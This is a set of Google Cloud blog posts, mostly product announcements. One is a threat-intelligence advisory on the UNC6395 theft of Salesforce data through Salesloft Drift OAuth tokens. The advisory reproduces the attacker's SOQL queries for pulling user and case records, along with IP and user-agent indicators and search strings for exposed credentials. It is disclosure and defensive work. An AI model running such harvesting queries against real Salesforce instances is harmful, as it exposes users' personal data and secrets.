We’re excited to announce that Google has been named a Leader in the IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment (doc #US52036825, August 2025). According to the report, “Mandiant, now a core part of Google Cloud Security, continues to be one of the most recognized and respected names in incident response. With over two decades of experience, Mandiant has built a reputation for responding to some of the world’s most complex and high-impact cyberincidents.” We believe this recognition reflects Mandiant’s extensive experience in some of the world’s most complex and high-impact cyber incidents.

We employ a tightly coordinated “team of teams” model, integrating specialized groups for forensics, threat intelligence, malware analysis, remediation, and crisis communications to assist our customers quickly and effectively.

Our expertise spans technologies and environments, from multicloud and on-premise systems to critical infrastructure. We help secure both emerging and mainstream technologies including AI, Web3, cloud platforms, web applications, and identity systems.

“This structure allows Mandiant to deliver rapid, scalable, and highly tailored responses to incidents ranging from ransomware and nation-state attacks to supply chain compromises and destructive malware,” said the IDC MarketScape report.

idc marketscape — SOURCE: “IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment” by Craig Robinson & Scott Tiazkun, August 2025, IDC # US52036825.

IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology and suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each supplier’s position within a given market. The Capabilities score measures supplier product, go-to-market and business execution in the short-term. The Strategy score measures alignment of supplier strategies with customer requirements in a 3-5-year timeframe. Supplier market share is represented by the size of the icons.

Differentiated, rapid, and holistic incident response

Speed is crucial in cyber-incident response, and cyber events can quickly become a reputational crisis. Helping customers address those concerns drives our Incident Response Services.

A key part of that is Mandiant’s Cyber Crisis Communication Planning and Response Services, launched in 2022. The IDC MarketScape noted, “The firm’s crisis communications practice, launched in 2022, is a unique offering in the IR space. Recognizing that cyberincidents are as much about trust and perception as they are about technology, Mandiant provides strategic communications support to help clients manage media inquiries, stakeholder messaging, and align with regulatory frameworks.”

Our approach combines robust remediation, recovery, and resilience solutions, including repeatable and cost-effective minimal viable business recovery environments. Designed to restore critical operations after ransomware attacks, our offerings can help reduce recovery timelines from weeks to days — or even hours.

The report notes, “A key differentiator is Mandiant’s integration with Google’s SecOps platform, which enables rapid deployment of investigative capabilities without the need for lengthy software installations. This allows Mandiant to begin triage and scoping within hours, leveraging existing client telemetry and augmenting it with proprietary forensic tools like FACT and Monocle. These tools allow for deep forensic interrogation of endpoints and orchestration of data collection at enterprise scale — capabilities that go beyond what traditional EDR platforms offer.”

Unparalleled access to threat intelligence

Google Threat Intelligence fuses Mandiant’s frontline expertise, the global reach of the VirusTotal community, and the visibility from Google’s services and devices — enhanced by AI. “As part of Google, Mandiant now benefits from unparalleled access to global infrastructure, engineering resources, and threat intelligence,” said the IDC MarketScape report.

By ensuring that this access is deeply embedded in Mandiant Incident Response and Consulting services, we can quickly identify threat actors, tactics, and indicators of compromise (IOCs). A dedicated threat intelligence analyst supports each incident response case, ensuring findings are contextualized and actionable.

Advancing cyber defenses with a strategic, global leader

For more than two decades, Mandiant experts have helped global enterprises respond to and recover from their worst days. We enable organizations to go beyond technology solutions, evaluate specific business threats, and strengthen their cyber defenses.

As part of our commitment to helping organizations around the world, we encourage knowledge sharing through our public threat intelligence reports and playbooks, we operate a pro bono victim notification program, and we maintain partnerships with 59 law firms and 46 insurers, who often call Mandiant first when a client is breached.

“Organizations that seek to work with a globally capable IR firm with strong threat intelligence capabilities and that utilizes a holistic approach to incident response that goes beyond the technical portions should consider Google,” said the report.

Learn more — and strengthen your defenses today

You can read a complimentary excerpt of the IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment report here.

Read More for the details.

2025 08 26

GCP – Announcing general availability of Firestore with MongoDB compatibility

Tibor Kiss Cloud, Google Cloud gcp

At Cloud Next ’25, we announced the preview of Firestore with MongoDB compatibility, empowering developers to build cost-effective, scalable, and highly reliable apps on Firestore’s serverless database using a familiar MongoDB-compatible API. Today, we’re announcing that Firestore with MongoDB compatibility is now generally available.

With this launch, the 600,000 active developers within the Firestore community can now use existing MongoDB application code, drivers, and tools, as well as the open-source ecosystem of MongoDB integrations with Firestore’s distinguished serverless service. Firestore provides benefits such as multi-region replication with strong consistency, virtually unlimited scalability, industry-leading high availability with an up to 99.999% SLA, single-digit milliseconds read performance, integrated Google Cloud governance, and a cost-effective pay-as-you-go pricing model.

Firestore with MongoDB compatibility is attracting significant customer interest from diverse industries, including financial services, healthcare, retail, and manufacturing. We’re grateful for the engagement and opportunity this afforded to prioritize features that enable key customer use cases. For instance, a prominent online retail company sought to migrate their product catalog from another document database to Firestore with MongoDB compatibility to maximize scalability and availability. To support this migration, the customer maximized new capabilities like unique indexes to guarantee distinct universal product identifiers. The customer is excited to migrate their production traffic to Firestore with MongoDB compatibility now that it’s generally available.

You can learn more about how to get started at our Firestore with MongoDB compatibility page.

aside_block: <ListValue: [StructValue([(‘title’, ‘Firestore webinar’), (‘body’, <wagtail.rich_text.RichText object at 0x3e781e56faf0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

What’s new in Firestore with MongoDB compatibility

Based on direct customer feedback during the preview, we introduced new capabilities to Firestore with MongoDB compatibility, including expanded support for the Firestore with MongoDB compatibility API, enhanced enterprise readiness, and access from both Firebase and Google Cloud. Let’s take a closer look.

1. Expanded support for Firestore with MongoDB compatibility API and query language

Firestore with MongoDB compatibility API and query language now supports over 200 capabilities. Developers can now create richer applications by leveraging new stages and operators that enable joining data across collections, data analysis within buckets, and advanced querying capabilities including arrays, sets, arithmetic, type conversion, and bitwise operations. We also added support for creating indexes directly from the Firestore with MongoDB compatibility API, including the ability to create unique indexes that ensure distinct field values across documents within a collection. Furthermore, the Firestore Studio console editor now features a new JSON viewer and a data export tool. You can find a comprehensive list of Firestore with MongoDB compatibility capabilities in the documentation.

2-firestore-enterprise-ga-studio — Utilize the MongoDB Query Language (MQL) to run queries like pinpointing optimal wishlist purchase conversions, using new operators and stages such as $setIntersection and $lookup.

2. Built for the enterprise

We have built Firestore with MongoDB compatibility to meet the needs of the enterprise, including new disaster recovery, change data capture, security, and observability features.

For disaster recovery, we’ve integrated Point-in-Time Recovery (PITR) to complement existing scheduled backups. This helps you recover from human errors, such as accidental data deletion, by enabling version control to rollback back at any point in time from the past seven days. We’ve also introduced database clones, allowing you to create an isolated copy of your database for staging, development, or analytics from any point-in-time recovery snapshot. Furthermore, we’ve incorporated managed export and import, enabling you to create a portable copy of your Firestore data in Cloud Storage for archival and other regulatory purposes.

3-firestore-enterprise-ga-pitr — Firestore offers multiple, easy-to-use, disaster recovery options including point-in-time recovery and scheduled backups.

For change data capture, trigger support has been added, enabling the configuration of server-side code to respond to document creation, updates, or deletions within your collections. This facilitates the replication of Firestore data changes to other services, such as BigQuery.

Regarding security, Private Google Access has been implemented, providing secure access from in-perimeter Google Cloud services with a private IP address, to a Firestore with MongoDB compatibility database. This connection option is available with no additional cost.

In terms of observability, Firestore with MongoDB compatibility now supports new metrics within a Firestore usage page. This simplifies the identification of MongoDB compatibility API calls that contribute to cost and traffic. This observability feature augments existing capabilities like query explain and query insights to help optimize usage.

3. Broader accessibility through Firebase in addition to Google Cloud

Finally, you can now access Firestore with MongoDB compatibility alongside all of your favorite developer services in Firebase, as well as in Google Cloud. This means you can manage Firestore with MongoDB compatibility from both the Firebase and Google Cloud consoles, and their respective command-line interfaces (CLI).

4-firestore-enterprise-ga-firebase — Create, manage and query your Firestore with MongoDB compatibility database using the Firebase Console.

We’re thrilled to see what you’ll be able to achieve using Firestore with MongoDB compatibility. Get started today with Firestore with MongoDB compatibility—now generally available as part of Firestore Enterprise edition. To get started, create a new Firestore Enterprise edition database with MongoDB compatibility. There are no upfront fees and a free tier is available for all Firestore customers.

5-firestore-enterprise-ga-create — Create your Firestore with MongoDB compatibility database today!

Read More for the details.

2025 08 26

GCP – Happy birthday, GKE! Let’s celebrate with new features and better pricing

Tibor Kiss Cloud, Google Cloud gcp

“While containers make packaging apps easier, a powerful cluster manager and orchestration system is necessary to bring your workloads to production.”

Ten years ago, these words opened the blog post announcing Google Kubernetes Engine (GKE). The need for a managed Kubernetes platform is as important today as it was then, especially as workloads have evolved to meet increasingly complex demands.

One year before GKE’s arrival, we open-sourced large parts of our internal container management system, Borg, as Kubernetes. This marked the beginning of offering our own platforms to customers, and as we continue to use Kubernetes and GKE to power leading services like Vertex AI, we distill our learnings and best practices into GKE. Innovating and evolving GKE to meet the demands of our global platforms and services means that we deliver a best-in-class platform for our customers.

Enhanced flexibility with updated pricing

After ten years of evolution comes another shift: we are updating GKE to make sure every customer can balance efficiency, performance, and cost as effectively as possible. In September 2025, we’re moving to a single paid tier of GKE that comes with more features, and that lets you add features as needed. Now, every customer can take advantage of multi-cluster management features like Fleets, Teams, Config Management, and Policy Controller — all available with GKE Standard at no additional cost.

Flexibility and versatility are always in demand. The new GKE pricing structure provides à la carte access to additional features to meet the specific needs of all of your clusters. We want you to direct your resources toward the most impactful work at all times, and are confident that a single GKE pricing tier will help you manage your workloads — and your budgets — more effectively.

Optimized compute with Autopilot for every cluster

When we launched GKE Autopilot four years ago, we made Kubernetes accessible to every organization — no Kubernetes expertise required. More recently, we rolled out a new container-optimized compute platform, which delivers unique efficiency and performance benefits, ensuring you get the most out of your workload’s allocated resources, so you can serve more traffic with the same capacity, or existing traffic with fewer resources.

Now, we’re making Autopilot available for every cluster, including existing GKE Standard clusters, on an ad hoc, and per-workload basis. Soon, you’ll be able to turn on Autopilot (and off) in any existing Standard cluster to take advantage of fully managed Kubernetes with better performance, at the best price.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e781f525f40>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Innovations for customer success

The technological landscape shifts quickly. A few years ago, organizations were thinking about stateless microservices; today, the focus is on running complex AI workloads. Throughout, we’re always adapting GKE to meet the needs of innovative companies for new scenarios.

We’re proud of the many incredible products and services built on GKE by customers ranging from startups, to enterprises, to AI companies. AI-powered advertising provider Moloco trains and runs its models with TPUs running on GKE. For nearly a decade, Signify has leveraged GKE as the foundation for its Philips Hue smart lighting platform worldwide. And AI unicorn Anthropic depends on GKE to deliver the scale they need to train and serve their models.

“GKE’s new support for larger clusters provides the scale we need to accelerate our pace of AI innovation.” – James Bradbury, Head of Compute, Anthropic

Foundations for consistent evolution

The AI era has just begun, and we’ve been pushing GKE to meet tomorrow’s workload demands today. With customer insights and Google’s best practices baked in, GKE is the ideal platform for developing and deploying AI at scale.

Thank you to our community, customers, and partners who have been on the GKE journey with us. Celebrate a decade of GKE with us by joining the GKE Turns 10 Hackathon and reading the 10 years of GKE ebook. The future is revealing itself every day, and GKE is ready for wherever AI takes us next.

Read More for the details.

2025 08 26

GCP – Building next-gen visuals with Gemini 2.5 Flash Image on Vertex AI

Tibor Kiss Cloud, Google Cloud gcp

Today, we announced native image generation and editing in Gemini 2.5 Flash to deliver higher-quality images and more powerful creative control. Gemini 2.5 Flash Image is State of the Art (SOTA) for both generation and image editing. For creative use cases, this means you can create richer, more dynamic visuals and edit images until they’re just right. Here are some ways you can use our state of the art native image generation in Gemini 2.5 Flash.

Multi-image fusion: Combine different images into one seamless new visual. You can use multiple reference images to create a single, unified image for use cases such as marketing, training, or advertising.
Character & style consistency: Maintain the same subject or visual style across multiple generations. Easily place the same character or product in different scenes without losing their identity, saving you from time-consuming fine-tuning.
Conversational editing: Edit images with simple, natural language instructions. From removing a person from a group photo to fixing a small detail like a stain, you can make changes through a simple conversation.

Developers and enterprises can access Gemini 2.5 Flash Image in preview today on Vertex AI.

Here’s how customers are leveraging Vertex AI to build next-gen visuals with Gemini 2.5 Flash Image

“With today’s addition of Google’s Gemini 2.5 Flash Image in Adobe Firefly and Adobe Express, people have even greater flexibility to explore their ideas with industry-leading generative AI models and create stunning content with ease. And with seamless integration across Creative Cloud apps, only Adobe delivers a complete creative workflow that takes ideas from inspiration to impact – empowering everyone with the freedom to experiment, the confidence to perfect every detail, and the control to make their work stand out.” – Hannah Elsakr, Vice President, New GenAI Business Ventures, Adobe

“In our evaluation, Gemini 2.5 Flash Image showed notable strengths in maintaining cross‑edit coherence — preserving both fine‑grained visual details and higher‑level scene semantics across multiple revision cycles. Combined with its low response times, this enables more natural, conversational editing loops and supports deployment in real‑time image‑based applications on Poe and through our API.” – Nick Huber, AI Ecosystem Lead, Poe (by Quora)

“Gemini 2.5 Flash Image an incredible addition to Google’s gen media suite of models. We have tested it across multiple WPP clients and products and have been impressed with the quality of output. We see powerful use cases across multiple sectors, particularly retail, with its ability to combine multiple products into single frames, and CPG, where it maintains a high level of object consistency across frames. We are looking forward to integrating Gemini 2.5 Flash Image into WPP Open, our AI-enabled marketing services platform and developing new production workflows.” – Daniel Barak, Global Creative and Innovation Lead, WPP

“For anyone working with visual content, Gemini 2.5 Flash Image is a serious upgrade. Placing products, keeping styles aligned, and ensuring character consistency can all be done in a single step. The model handles complex edits easily, producing results that look polished and professional instantly. Freepik has integrated it into the powerful AI suite powering image generation and editing to help creatives express the power of their ideas.” – Joaquin Cuenca, CEO, Freepik

“Editing requires the highest level of control in any creative process. Gemini 2.5 Flash Image meets that need head-on, delivering precise, iterative changes. It also exhibits extreme flexibility – allowing for significant adjustments to images while retaining character and object consistency. From our early testing at Leonardo.Ai, this model will enable entirely new workflows and creative possibilities, representing a true step-change in capability for the creative industry.” – JJ Fiasson, CEO, Leonardo.ai

Figma‘s AI image tools now include Google’s Gemini 2.5 models, enabling designers to generate and refine images using text prompts—creating realistic content that helps communicate design vision.

Get started

Gemini 2.5 Flash Image is available in preview today on Vertex AI with built-in SynthID watermarking for responsible and transparent use. Dive into the documentation to start building with it today.

Read More for the details.

2025 08 26

GCP – Widespread Data Theft Targets Salesforce Instances via Salesloft Drift

Tibor Kiss Cloud, Google Cloud gcp

Written by: Austin Larsen, Matt Lin, Tyler McLellan, Omar ElAhdan

Introduction

Google Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395. Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.

The actor systematically exported large volumes of data from numerous corporate Salesforce instances. GTIG assesses the primary intent of the threat actor is to harvest credentials. After the data was exfiltrated, the actor searched through the data to look for secrets that could be potentially used to compromise victim environments. GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. UNC6395 demonstrated operational security awareness by deleting query jobs, however logs were not impacted and organizations should still review relevant logs for evidence of data exposure.

Salesloft indicated that customers that do not integrate with Salesforce are not impacted by this campaign. There is no evidence indicating direct impact to Google Cloud customers, however any customers that use Salesloft Drift should also review their Salesforce objects for any Google Cloud Platform service account keys.

On Aug. 20, 2025 Salesloft, in collaboration with Salesforce, revoked all active access and refresh tokens with the Drift application. In addition, Salesforce removed the Drift application from the Salesforce AppExchange until further notice and pending further investigation. This issue does not stem from a vulnerability within the core Salesforce platform.

GTIG, Salesforce, and Salesloft have notified impacted organizations.

Threat Detail

The threat actor executed queries to retrieve information associated with Salesforce objects such as Cases, Accounts, Users, and Opportunities. For example, the threat actor ran the following sequence of queries to get a unique count from each of the associated Salesforce objects.

SELECT COUNT() FROM Account;

SELECT COUNT() FROM Opportunity;

SELECT COUNT() FROM User;

SELECT COUNT() FROM Case;

Query to Retrieve User Data

SELECT Id, Username, Email, FirstName, LastName, Name, Title, CompanyName, 
Department, Division, Phone, MobilePhone, IsActive, LastLoginDate, 
CreatedDate, LastModifiedDate, TimeZoneSidKey, LocaleSidKey, 
LanguageLocaleKey, EmailEncodingKey 
FROM User 
WHERE IsActive = true
ORDER BY LastLoginDate DESC NULLS LAST 
LIMIT 20

Query to Retrieve Case Data

SELECT Id, IsDeleted, MasterRecordId, CaseNumber <snip>
FROM Case
LIMIT 10000

Recommendations

Given GTIG’s observations of data exfiltration associated with the campaign, organizations using Drift integrated with Salesforce should consider their Salesforce data compromised and are urged to take immediate remediation steps.

Impacted organizations should search for sensitive information and secrets contained within Salesforce objects and take appropriate action, such as revoking API keys, rotating credentials, and performing further investigation to determine if the secrets were abused by the threat actor.

Investigate for Compromise and Scan for Exposed Secrets

Search for the IP addresses and User-Agent strings provided in the IOCs section below. While this list includes IPs from the Tor network that have been observed to date, Mandiant recommends a broader search for any activity originating from Tor exit nodes.
Review Salesforce Event Monitoring logs for unusual activity associated with the Drift connection user.
Review authentication activity from the Drift Connected App.
Review UniqueQuery events that log executed SOQL queries.
Open a Salesforce support case to obtain specific queries used by the threat actor.
Search Salesforce objects for potential secrets, such as:

AKIA for long-term AWS access key identifiers
Snowflake or snowflakecomputing.com for Snowflake credentials
password, secret,key to find potential references to credential material
Strings related to organization-specific login URLs, such as VPN or SSO login pages

Run tools like Trufflehog to find secrets and hardcoded credentials.

Rotate Credentials

Immediately revoke and rotate any discovered keys or secrets.
Reset passwords for associated user accounts.
Configure session timeout values in Session Settings to limit the lifespan of a compromised session.

Harden Access Controls

Review and Restrict Connected App Scopes: Ensure that applications have the minimum necessary permissions and avoid overly permissive scopes like full access.
Enforce IP Restrictions on the Connected App: In the app’s settings, set the ‘IP Relaxation’ policy to ‘Enforce IP restrictions’.
Define Login IP Ranges: On user profiles, define IP ranges to only allow access from trusted networks.
Remove the ‘API Enabled’ Permission: Remove the ‘API Enabled’ permission from profiles and grant it only to authorized users via a Permission Set.

Additional instructions and updates are available on the Salesloft Trust Center.

Acknowledgments

We would like to thank Salesforce, Salesloft, and other trusted partners for their collaboration and assistance in responding to this threat.

IOCs

A collection of indicators of compromise (IOCs) is available in a Google Threat Intelligence (GTI) collection for registered users.

Indicator Value	Description
Salesforce-Multi-Org-Fetcher/1.0	Malicious User-Agent string
Salesforce-CLI/1.0	Malicious User-Agent string
python-requests/2.32.4	User-Agent string
Python/3.11 aiohttp/3.12.15	User-Agent string
208.68.36.90	DigitalOcean
44.215.108.109	Amazon Web Services
154.41.95.2	Tor exit node
176.65.149.100	Tor exit node
179.43.159.198	Tor exit node
185.130.47.58	Tor exit node
185.207.107.130	Tor exit node
185.220.101.133	Tor exit node
185.220.101.143	Tor exit node
185.220.101.164	Tor exit node
185.220.101.167	Tor exit node
185.220.101.169	Tor exit node
185.220.101.180	Tor exit node
185.220.101.185	Tor exit node
185.220.101.33	Tor exit node
192.42.116.179	Tor exit node
192.42.116.20	Tor exit node
194.15.36.117	Tor exit node
195.47.238.178	Tor exit node
195.47.238.83	Tor exit node

Read More for the details.

2025 08 25

GCP – Chat with your data from anywhere: Announcing Google’s Conversational Analytics API

Tibor Kiss Cloud, Google Cloud gcp

Decision-makers, employees, and customers all need answers where they work: in the applications they use every day. In recent years, the rise of AI-powered BI has transformed our relationship with data, enabling us to ask questions in natural language and get answers fast. But even with support for natural language, the insights you receive are often confined to the data in your BI tool. At Google Cloud, our goal is to change this.

At Google Cloud Next 25, we introduced the Conversational Analytics API, which lets developers embed natural-language query functionality in custom applications, internal tools, or workflows, all backed by trusted data access and scalable, reliable data modeling. The API is already powering first-party Google Cloud conversational experiences including Looker and BigQuery data canvas, and is available for Google Cloud developers of all stripes to implement wherever their imagination takes them. Today we release the Conversational Analytics API in public preview. Start building with our documentation.

The Conversational Analytics API lets you build custom data experiences that provide data, chart, and text answers while leveraging Looker’s trusted semantic model for accuracy or providing critical business and data context to agents in BigQuery. You can embed this functionality to create intuitive data experiences, enable complex analysis via natural language, and even orchestrate conversational analytics agents as ‘tools’ for an orchestrator agent using Agent Development Kit.

The Google Health Population app is being developed with the Conversational Analytics API

Getting to know the Conversational Analytics API

The Conversational Analytics API allows you to interact with your BigQuery or Looker data through chat, from anywhere. Embed side-panel chat next to your Looker dashboards, invoke agents in chat applications like Slack, customize your company’s web applications, or build multi-agent systems.

This API empowers your team to obtain answers precisely when and where they are needed, directly within their daily workflows. It achieves this by merging Google’s advanced AI models and agentic capabilities with Looker’s semantic layer and BigQuery’s context engineering services. The result is natural language experiences that can be shared across your organization, making data-to-insight interaction seamless in your company’s most frequently used applications.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebcfb3c6280>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Building with Google’s Analytics and AI stack comes with significant benefits in accurate question answering:

Best-in-class AI for data analytics
An agentic architecture that enables the system to perceive its environment and take actions
Access to Looker’s powerful semantic layer for trustworthy answers
High-performance agent tools, including software functions, charts and APIs, supported by dedicated engineering teams
Python code interpreter for advanced analysis
Tune your agent’s knowledge with structured context and prompts

Flexibility to build the agentic applications that best suit your data needs:

Create, update, and share agents that let users chat with BigQuery or Looker data
Lower maintenance burden via stateful APIs for agent and conversation management
Full control of your user experience via our stateless chat API
Build multi-agent architectures by wrapping APIs with ADK and MCP
Help agents understand your business and data with AI-Assisted context engineering
Version control your agents, updating prompts without affecting production use

And the enterprise controls and security you expect from Google Cloud Platform:

Govern the use of agents using role based access controls
Trust your data is secure with data with row and column level access controls by default
Guard against expensive queries with built-in query limitations

When pairing Conversational Analytics API with Looker, Looker’s semantic layer reduces data errors in gen AI natural language queries by as much as two thirds, so that queries are sourced in truth.

Looker’s semantic layer ensures your conversational analytics are grounded in data truth.

An agentic architecture powered by Google AI

The Conversational Analytics API uses purpose-built models for querying and analyzing data to provide accurate answers, while its flexible agentic architecture lets you configure which capabilities the agent leverages to best provide users with answers to their questions.

Conversational Analytics leverages an agentic architecture to empower agent creators with the right tools.

As a developer, you can compose AI-powered agents with the following tools:

Text-to-SQL, trusted by customers using Gemini in BigQuery
Context retrieval, informed by personalized and organization usage
Looker’s NL-to-Looker Query Engine, to leverage the analyst-curated semantic layer
Code Interpreter, for advanced analytics like forecasting and root-cause analysis
Charting, to create stunning visualizations and bring data to life
Insights, to explain answers in plain language

These generative AI tools are built upon Google’s latest Gemini models and fine-tuned for specific data analysis tasks to deliver high levels of accuracy. There’s also the Code Interpreter for Conversational Analytics, which provides computations ranging from cohort analysis to period-over-period calculations. Currently in preview, Code Interpreter turns you into a data scientist without having to learn advanced coding or statistical methods. Sign up for early access here.

Context retrieval and generation

A good data analyst isn’t just smart, but also deeply knowledgeable about your business and your data. To provide the same kind of value, a “chat with your data” experience should be just as knowledgeable. That’s why the Conversational Analytics API prioritizes gathering context about your data and queries.

Thanks to retrieval augmented generation (RAG), our Conversational Analytics agents know you and your data well enough to know that when you’re asking for sales in “New York” or “NYC,” you mean “New York City.” The API understands your question’s meaning to match it to the most relevant fields to query, and learns from your organization, recognizing that, for example, “revenue_final_calc” may be queried more frequently than “revenue_intermediate” in your BigQuery project, and adjusts accordingly. Finally, the API learns from your past interactions; it will remember that you queried about “customer lifetime value” in BigQuery Studio on Tuesday when you ask about it again on Friday.

Not all datasets have the context an agent needs to do its work. Column descriptions, business glossaries, and question-query pairs can all improve an agent’s accuracy, but they can be hard to create manually— especially if you have 1,000 tables in your business, each with 500 fields. To speed up the process of teaching your agent, we are including AI-assisted context, using Gemini to suggest metadata that might be useful for your agent to know, while letting you approve or reject changes.

Low maintenance burden

The Conversational Analytics API gives you access to the latest data agent tools from Google Cloud, so you can focus on building your business, not building more agents. You benefit from Google’s continued advancements in generative AI for coding and data analysis.

When you create an agent, we protect your data with Google’s security, best practices, and role-based access controls. Once you share your Looker or BigQuery agent, it can be used across Google Cloud products, such as Agent Development Kit, and in your own applications.

The Conversational Analytics API lets you interact with your data anywhere.

API powered chats from anywhere

With agents consumable via API, you can surface insights anywhere decision makers need them—whether it’s when speaking with a customer over a support ticket, via a tablet when you’re in the field, or in your messaging apps.

The Conversational Analytics API is designed to bring benefits to all users, whether they be business users, data analysts building agents, or software developers. With Conversational Agents, when a user asks a question, answers are delivered rapidly alongside the agent’s thinking process, to ensure the right approach to gaining insights is used. Individual updates allow your developers to control what a user sees — like answers and charts — and what you want to log for later auditing by analysts — like SQL and Python code.

To get started, you can use our our documentation and API references for REST APIs and SDKs, as well as code examples in example Colab notebooks, streamlit application on GitHub, and typescript reference application.

Read More for the details.

2025 08 25

GCP – Enhancing BigQuery geospatial with Earth Engine raster analytics and map visualization

Tibor Kiss Cloud, Google Cloud gcp

Geospatial analytics can transform rich data into actionable insights that drive sustainable business strategy and decision making. At Google Cloud Next ‘25, we announced the preview of Earth Engine in BigQuery, an extension of BigQuery’s current geospatial offering, focused on enabling data analysts to seamlessly join their existing structured data with geospatial datasets derived from satellite imagery. Today, we’re excited to announce the general availability of Earth Engine in BigQuery and the preview of a new geospatial visualization capability in BigQuery Studio. With this new set of tools, we’re making geospatial analysis more accessible to data professionals everywhere.

Bringing Earth Engine to data analysts

Earth Engine in BigQuery makes it easy for data analysts to leverage core Earth Engine capabilities from within BigQuery. Organizations using BigQuery for data analysis can now join raster (and other data created from satellite data) with vector data in their workflows, opening up new possibilities for use cases such as assessing natural disaster risk over time, supply chain optimization, or infrastructure planning based on weather and climate risk data.

This initial release introduced two features:

ST_RegionStats() geography function: A new BigQuery geography function enabling data analysts to derive critical statistics (such as wildfire risk, average elevation, or probability of deforestation) from raster (pixel-based) data within defined geographic boundaries.
Earth Engine datasets in BigQuery Sharing: A growing collection of 20 Earth Engine raster datasets available in BigQuery Sharing (formerly Analytics Hub), offering immediate utility for analyzing crucial information such as land cover, weather, and various climate risk indicators.

What’s new in Earth Engine in BigQuery

With the general availability of Earth Engine in BigQuery, users can now leverage an expanded set of features, from what was previously available in preview:

Expanded regional deployment: Earth Engine in BigQuery now supports EU (multi-region) and europe-west1, in addition to US regions, for both data storage and computation, offering greater flexibility for regional needs and regulations.
Enhanced metadata visibility: A new Image Details tab in BigQuery Studio provides expanded information on raster datasets, such as band and image properties. This makes geospatial dataset exploration within BigQuery easier than ever before.
Improved usage visibility: View slot-time used per job and set quotas for Earth Engine in BigQuery to control your consumption, allowing you to manage your costs and better align with your budgets.

New Image Detail tab in BigQuery Studio displays metadata for Aqueduct Flood Hazard dataset

A new way to visualize BigQuery geospatial data

We know visualization is crucial to understanding geospatial data and insights in operational workflows. That’s why we’ve been working on improving visualization for the expanded set of BigQuery geospatial capabilities. Today, we’re excited to introduce map visualization in BigQuery Studio, now available in preview.

You might have noticed that the “Chart” tab in the query results pane of BigQuery Studio is now called “Visualization.” Previously, this tab provided a graphical exploration of your query results. With the new Visualization tab, you’ll have all the previous functionality and a new capability to seamlessly visualize geospatial queries (containing a GEOGRAPHY data type) directly on a Google Map, allowing for:

Instant map views: See your query results immediately displayed on a map, transforming raw data into intuitive visual insights.
Interactive exploration: Inspect results, debug your queries, and iterate quickly by interacting directly with the map, accelerating your analysis workflow.
Customized visualization: Visually explore your query results with easy-to-use, customizable styling options, allowing you to highlight key patterns and trends effectively.

Built directly into BigQuery Studio’s query results, map visualization simplifies query building and iteration, making geospatial analysis more intuitive and efficient for everyone.

Visualization tab displays a heat map of census tracts in Colorado with the highest wildfire risk using the Wildfire Risk to Community dataset

Example: Analyzing extreme precipitation events

The integration of Earth Engine in BigQuery with map visualization within a single platform creates a powerful and unified geospatial analytics platform. This allows analysts to move from data discovery to complex analysis and visualization within a single platform, significantly reducing the time to insight. For businesses, this offers powerful new capabilities for assessing climate risk directly within their existing data workflows.

Consider a scenario where an insurance provider needs to assess how hydroclimatic risk is changing across its portfolio in Germany. Using Earth Engine in BigQuery, the provider can analyze decades of climate data to identify trends and changes in extreme precipitation events.

The first step is to access the necessary climate data. Through BigQuery Sharing, you can subscribe to Earth Engine datasets directly. For this analysis, we’ll use the ERA5 Land Daily Aggregates dataset (daily grid or “image” weather maps) to track historical precipitation.

BigQuery Sharing listings for Earth Engine with the ERA5 Daily Land Aggregates highlighted (left) and the dataset description with the “Subscribe” button (right)

By subscribing to the dataset, we can now query it. We use the ST_RegionStats() function to calculate statistics (like the mean or sum) for an image band over a specified geographic area. In the query below, we calculate the mean daily precipitation for a subset of counties in Germany for each day in our time range and then find the maximum value for each year:

Next, we analyze the output from the first query to identify changes in extreme event frequency. To do this, we calculate return periods. A return period is a statistical estimate of how likely an event of a certain magnitude is to occur. For example, a “100-year event” is not one that happens precisely every 100 years, but rather an event so intense that it has a 1% (1/100) chance of happening in any given year. This query compares two 30-year periods (1980-2010 vs. 1994-2024) to see how the precipitation values for different return periods have changed:

Note: This query can only be run in US regions. The Overture dataset is US-only. In addition, Earth Engine datasets are rolling out to EU regions over the coming weeks.

